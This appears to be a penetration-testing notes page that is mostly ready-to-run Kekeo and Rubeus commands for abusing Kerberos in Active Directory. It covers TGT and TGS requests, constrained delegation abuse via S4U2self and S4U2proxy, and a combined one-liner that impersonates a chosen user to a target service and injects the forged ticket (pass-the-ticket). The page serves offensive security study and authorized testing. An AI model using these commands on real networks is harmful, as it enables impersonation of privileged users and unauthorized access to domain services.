kekeo/rubeus

Resources

Rubeus

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

Kekeo

GitHub - gentilkiwi/kekeo: A little toolbox to play with Microsoft Kerberos in CGitHub

Service for User (S4U)

[MS-SFU]: Kerberos Protocol Extensions: Service for User and Constrained Delegation ProtocolMicrosoftLearn

S4U2self and S4U2proxy

[MS-SFU]: S4U2selfMicrosoftLearn

[MS-SFU]: S4U2proxyMicrosoftLearn

For each of the following sections, I aim to provide the equivalent commands in Kekeo and Rubeus (some of the sections may only have examples in one tool).

1. Request for Ticket Granting Ticket (TGT)

kekeo # tgt::ask /user:<user> /domain:<domain> /password:<password>
C:\> rubeus.exe asktgt /user:<user> /password:<password>

For rubeus, if /password is used instead of a hash, /enctype:X will default to RC4 for the exchange, with des|aes128|aes256 as options

2. Request for Ticket Granting Service (TGS)

C:\> rubeus.exe asktgs /ticket:<ticket> /service:<servicename>

3. Constrained delegation abuse: Service for User (S4U)

kekeo # tgs::s4u /tgt:<path_to_TGT> /user:<username> /service:<servicename>

The kekeo command listed above essentially performs the S4U2self and S4U2proxy steps that can be achieved with rubeus (refer below).

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

From the Rubeus S4U documentation page link above, we can find a few examples:

a. S4U2self

C:\> rubeus.exe s4u /user:<username> /rc4:<rc4_hash> /impersonateuser:<user_to_impersonate>

/rc4: rc4 hash of the user associated with /user
- The TGT for an account with a msds-allowedtodelegateto permission can be used instead (/ticket:X)
/impersonateuser : compulsory parameter to specify the user we plan to obtain a service ticket on behalf for

From this command, we will obtain the following:

A TGT for the user specified in /user
A TGS for the user specified in /impersonateuser

Using the S4U2self extension: the service account can use the TGS obtained to authenticate to itself (or more specifically, the service it is running) on behalf of the user specified in /impersonateuser

b. S4U2proxy

C:\> rubeus.exe s4u /ticket:<TGT> /msdsspn:<SPN> /tgs:<TGS>

/ticket : TGT obtained from the previous step
/mdsspn : Service Principal Name (SPN)
- This value must be listed under the msds-allowedtodelegateto property for the service account (supplied to the /user field in the previous step)
/tgs : The forwardable ticket retrieved from the previous step (S4U2self ticket for the user specified in /impersonateuser)

From this command, we obtain a TGS for the impersonated user (specified in /impersonateuser) to the service defined in /msdsspn.

Next, we can use the TGS we have obtained to authenticate to the service (defined in /mdsspn) as our desired user:

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

C:\> rubeus.exe ptt /ticket:TGS

or by supplying the /ptt flag to the s4u command.

C. Combining all steps: TGT request, S4U2self process, S4U2proxy execution and pass-the-ticket (injection of the final ticket)

C:\> rubeus.exe s4u /user:<username> /rc4:<rc4_hash> /impersonateuser:<user_to_impersonate> /msdsspn:<SPN> /ptt

Previoussekurlsa::pth NextLazagne

Last updated 4 months ago

hashtagResources

hashtag1. Request for Ticket Granting Ticket (TGT)

hashtag2. Request for Ticket Granting Service (TGS)

hashtag3. Constrained delegation abuse: Service for User (S4U)

hashtaga. S4U2self

hashtagb. S4U2proxy

hashtagC. Combining all steps: TGT request, S4U2self process, S4U2proxy execution and pass-the-ticket (injection of the final ticket)

Resources

1. Request for Ticket Granting Ticket (TGT)

2. Request for Ticket Granting Service (TGS)

3. Constrained delegation abuse: Service for User (S4U)

a. S4U2self

b. S4U2proxy

C. Combining all steps: TGT request, S4U2self process, S4U2proxy execution and pass-the-ticket (injection of the final ticket)